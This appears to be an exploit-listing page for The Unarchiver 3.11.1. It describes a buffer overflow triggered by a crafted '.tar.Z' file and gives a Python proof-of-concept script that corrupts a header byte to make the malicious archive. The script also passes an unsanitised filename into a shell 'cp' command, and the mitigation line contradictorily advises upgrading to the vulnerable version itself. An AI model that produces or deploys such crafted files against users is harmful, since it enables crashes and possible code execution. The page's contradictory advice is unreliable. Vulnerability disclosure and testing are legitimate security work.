header-logo
Suggest Exploit
vendor:
The Unarchiver
by:
Antonio Z.
7,8
CVSS
HIGH
Local Crash
119
CWE
Product Name: The Unarchiver
Affected Version From: 3.11.1
Affected Version To: 3.11.1
Patch Exists: YES
Related CWE: N/A
CPE: a:theunarchiver:the_unarchiver
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: OS X 10.10, OS X 10.11, OS X 10.12
2016

The Unarchiver 3.11.1 ‘.tar.Z’ Local Crash PoC

The Unarchiver 3.11.1 is vulnerable to a local crash when opening a specially crafted '.tar.Z' file. The vulnerability is caused due to a boundary error when processing the file header, which can be exploited to cause a stack-based buffer overflow via a specially crafted '.tar.Z' file. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of The Unarchiver 3.11.1.
Source

Exploit-DB raw data:

# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
# Date: 10-17-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
# Version: 3.11.1
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12

# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h

import os, struct, sys
from mmap import mmap

if len(sys.argv) <= 1:
    print "Usage: python Local_Crash_PoC.py [file name]"
    exit()

file_name = sys.argv[1]
file_mod = open(file_name, 'r+b')
file_hash = file_mod.read()

def get_extension(file_name):
    basename = os.path.basename(file_name)
    extension = '.'.join(basename.split('.')[1:])
    return '.' + extension if extension else None

def file_maping():
    maping = mmap(file_mod.fileno(),0)
    maping.seek(2)
    maping.write_byte(struct.pack('B', 255))
    maping.close()
    
new_file_name = "Local_Crash_PoC" + get_extension(file_name)
    
os.popen('cp ' + file_name + ' ' + new_file_name)
file_mod = open(new_file_name, 'r+b')
file_maping()
file_mod.close()
print '[+] ' + 'Created file: ' + new_file_name

Navigation

Suggest Exploit

Services By CQR